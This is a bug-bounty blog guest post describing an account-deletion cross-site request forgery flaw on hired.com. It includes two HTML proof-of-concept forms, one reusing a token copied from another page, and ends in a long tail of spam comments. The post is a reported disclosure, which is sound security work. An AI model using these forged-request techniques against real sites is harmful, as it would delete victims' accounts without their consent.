Account Deletion CSRF vulnerability in hired
[ads]
Account Deletion CSRF vulnerability in hired – Bug Bounty POC
This post is published by Bug Bounty POC on the request of Yasir as a guest writer.Note that the post is written by Yasir & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest so other can also learn.If you’re interested in sharing your finding through Bug Bounty POC Platform contact us on facebook group or via email support@bugbountypoc.com.
Hello BugBountyPoc Viewers,i am Yasir an independent security researcher. today i thought to share with you a bug which may help some beginners in learning CSRF exploitation
so let’s begin.the bug was in hired program—–www.hired.com through this vulnerability i was able to delete any one’s account.the vulnerability exist in two parts , first i exploited but was duplicate and 2nd helped me to get bounty in first csrf i was able to delete any one’s account as the csrf tokens /parameter was not required, mean i was able to delete any account without csrf parameter
POC :
https://hired.com/xx
post data will be_method=delete
or
<html>
<body>
<form action=”https://hired.com/xx” method=”POST”>
<input type=”hidden” name=”_method” value=”delete” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
unfortunately this was duplicate—
the 2nd was tricky, the csrf parameter and token was necessary so i tried many things, tried to chnge to get, put, removed tokens ,tried nullbytes etc but none worked that time i gave up and later found that if we use fake but valid csrf token i checked source and saw the site uses different csrf tokens to perform any task. i opened homepage
then searched for csrf tokens .
(Q8LmL2bzuRRnDkQgabCD7xs3W1/3zLVUkcR05t+CHIE1GsaJ7QyqK15+zl/8bkE9Fe1l7M5zvAOMrmgtGMz/Dw==)—
copied that and used. then tried on another account … hullla the csrf token works on other accounts tooo account was deleted
Poc
<html>
<body>
<form action=”https://hired.com/xx” method=”POST”>
<input type=”hidden” name=”_method” value=”delete” />
<input type=”hidden” name=”authenticity_token” value=”Q8LmL2bzuRRnDkQgabCD7xs3W1/3zLVUkcR05t+CHIE1GsaJ7QyqK15+zl/8bkE9Fe1l7M5zvAOMrmgtGMz/Dw==” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
this gave ne lesson that chech each and everything follow me on twitter @zargaryasir.
i would like to thank hired for giving me bounty :
F*ckin’ tremendous issues here. I am very satisfied to see your post. Thank you so much and i am having a look forward to touch you. Will you kindly drop me a mail?
You have touched some nice factors here. Any way keep up wrinting. Best regards
I really enjoy yout article. Good job:-)!
You made some nice points there. I did a search on the issue and found most persons will agree with your website.
Write more, thats all I have to say. Literally, it seems
as though you relied on the video to make your point. You obviously know what youre
talking about, why waste your intelligence on just posting videos
to your site when you could be giving us something enlightening to read?
Simply wanna remark that you have a very decent web site , I the style and design it really stands out.
I precisely needed to appreciate you again. I do not know the things I might have sorted out without the strategies documented by you regarding that area of interest. It absolutely was a real horrifying scenario in my opinion, but looking at this skilled way you dealt with it made me to leap with fulfillment. I am thankful for the information and thus expect you realize what a powerful job you happen to be getting into teaching people using your webblog. I’m certain you haven’t come across all of us.
WOW,another great share, thank you so much!
Thanks a lot for sharing this with all people you actually realize what you are speaking approximately! Bookmarked. Please also talk over with my site =). We can have a hyperlink change contract between us!
Thank you for another excellent article. Where else may just anyone get that kind of info in such a perfect way of writing? I have a presentation subsequent week, and I am on the search for such information.
I appreciate, lead to I discovered exactly what I was looking for. You have ended my 4 day long hunt! God Bless you man. Have a nice day. Bye
I would like to get across my love for your kind-heartedness giving support to people who must have help with your issue. Your personal commitment to passing the message all over turned out to be exceedingly practical and has usually encouraged employees like me to achieve their targets. Your personal warm and friendly suggestions means much a person like me and even further to my fellow workers. With thanks; from everyone of us.
You made certain good points there. I did a search on the theme and found the majority of folks will agree with your blog.
This is really interesting, You are a very skilled blogger. I have joined your feed and look forward to seeking more of your wonderful post. Also, I have shared your website in my social networks!
Thank you a lot for providing individuals with an extremely pleasant possiblity to check tips from here. It is usually so superb and as well , packed with a good time for me personally and my office acquaintances to visit your site at the very least thrice every week to read through the new stuff you will have. And definitely, I’m always impressed concerning the striking tactics you give. Some two facts on this page are absolutely the most effective I have ever had.
You are a very bright person!
I¡¦ll immediately grab your rss as I can’t find your e-mail subscription hyperlink or newsletter service. Do you have any? Please permit me understand so that I could subscribe. Thanks.
There is obviously a bundle to identify about this. I consider you made various nice points in features also.
Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed surfing around your blog posts. After all I will be subscribing to your feed and I hope you write again soon!
you’re truly a good webmaster. The web site loading speed is amazing. It kind of feels that you are doing any unique trick. Also, The contents are masterwork. you have performed a wonderful activity on this topic!
always i used to read smaller articles that also clear their motive, and that is also happening with this paragraph which I am reading at this place.|
Hi there! I could have sworn I’ve been to this site before but after checking through some of the post I realized it’s new to me. Anyways, I’m definitely glad I found it and I’ll be book-marking and checking back frequently!|
Happy to visit your page:-). Good post, looking for more. Best regards
Thanks a bunch for sharing this with all folks you actually recognize what you’re speaking approximately! Bookmarked. Please also visit my web site =). We will have a link alternate contract among us!
I was recommended this website by my cousin. I’m not sure whether this post is written by him as no one else know such detailed about my difficulty. You are wonderful! Thanks!
Heya i’m for the first time here. I came across this board and I find It really useful & it helped me out much. I hope to give something back and help others like you helped me.|
Very good blog. Please read something mine. See you!
Excellent site. Plenty of helpful information here. I am sending it to some buddies ans also sharing in delicious. And certainly, thanks on your effort!
I’ve been absent for some time, but now I remember why I used to love this blog. Thanks , I¡¦ll try and check back more often. How frequently you update your web site?
Thank you for another informative site. The place else could I am getting that type of info written in such an ideal way? I have a mission that I am just now running on, and I have been on the look out for such info.
Very well written information. It will be beneficial to everyone who utilizes it, as well as myself. Keep up the good work – i will definitely read more posts.
I enjoy your writing style truly enjoying this site.
I am continuously browsing online for ideas that can aid me. Thanks!
magnificent put up, very informative. I’m wondering why the other experts of this sector do not notice this. You should continue your writing. I’m confident, you’ve a huge readers’ base already!
Heya i’m for the first time here. I came across this board and I find It truly useful & it helped me out a lot. I hope to give something back and help others like you helped me.
I was suggested this blog by my cousin. I’m not sure whether this post is written by him as nobody else know such detailed about my problem. You are incredible! Thanks!
It¡¦s actually a great and helpful piece of information. I¡¦m happy that you just shared this useful information with us. Please keep us informed like this. Thanks for sharing.
Keep working ,great job!
Definitely, what a fantastic website and educative posts, I will bookmark your website.Best Regards!
Just want to say your article is as surprising. The clarity in your post is simply great and i can assume you are an expert on this subject. Well with your permission let me to grab your RSS feed to keep up to date with forthcoming post. Thanks a million and please keep up the gratifying work.
Great tremendous issues here. I am very satisfied to peer your post. Thanks a lot and i’m taking a look ahead to contact you. Will you please drop me a mail?
I am extremely impressed with your writing skills and also with the layout on your blog. Is this a paid theme or did you customize it yourself? Anyway keep up the excellent quality writing, it’s rare to see a nice blog like this one today..
This is really interesting, You’re a very skilled blogger. I have joined your rss feed and look forward to seeking more of your fantastic post. Also, I have shared your website in my social networks!|
Useful information. Fortunate me I found your website by accident, and I’m surprised why this coincidence did not came about in advance! I bookmarked it.
Howdy very cool site!! Man .. Beautiful .. Amazing .. I will bookmark your website and take the feeds also¡KI am happy to find numerous helpful information right here within the submit, we want work out more strategies in this regard, thank you for sharing. . . . . .
Hello there, I discovered your blog by means of Google while searching for a similar subject, your site got here up, it seems great. I’ve bookmarked it in my google bookmarks.
My brother recommended I might like this web site. He was totally right. This post truly made my day. You cann’t imagine just how much time I had spent for this information! Thanks!
Thanks.. 🙂
I¡¦ll right away grab your rss feed as I can not to find your e-mail subscription link or newsletter service. Do you have any? Kindly allow me realize so that I may subscribe. Thanks.
Hey sory! currently we don’t have any Rss Field or Email Subscription!
But you Can join our Group on Facebook.com
https://www.facebook.com/groups/986000878157257/ for more updates! 🙂
Happy Hacking!
regards
Bharat Sewani
Wow! This can be one particular of the most beneficial blogs We have ever arrive across on this subject. Actually Great. I am also an expert in this topic therefore I can understand your hard work.
thanks!
I have learn a few just right stuff here. Definitely worth bookmarking for revisiting. I wonder how so much effort you put to make such a fantastic informative web site.
Thanks Alot mate..! 🙂
It’s the best time to make some plans for the longer term and it is time to be happy. I’ve read this put up and if I may just I desire to counsel you some interesting things or tips. Perhaps you can write subsequent articles relating to this article. I wish to learn even more things about it!|
Sure! Just stay with us!
we always try to update something new for Folks!
and its our pleaseure if you read our blog!
thanks
happy hacking!
Hey there! Do you use Twitter? I’d like to follow you if that would be okay. I’m absolutely enjoying your blog and look forward to new posts.
Hey sory! we are not on Active on Twitter!
But you can Join our Facebook Groupe https://www.facebook.com/groups/986000878157257/ Where u can learn Alot of New Stuff
About Bug Bounty and EThical Hacking!
Happy Hacking
REgards
Bharat Sewani
Hi there! This is my first visit to your blog! We are a team of volunteers and starting a new initiative in a community in the same niche. Your blog provided us valuable information to work on. You have done a marvellous job!|
Keep functioning ,fantastic job!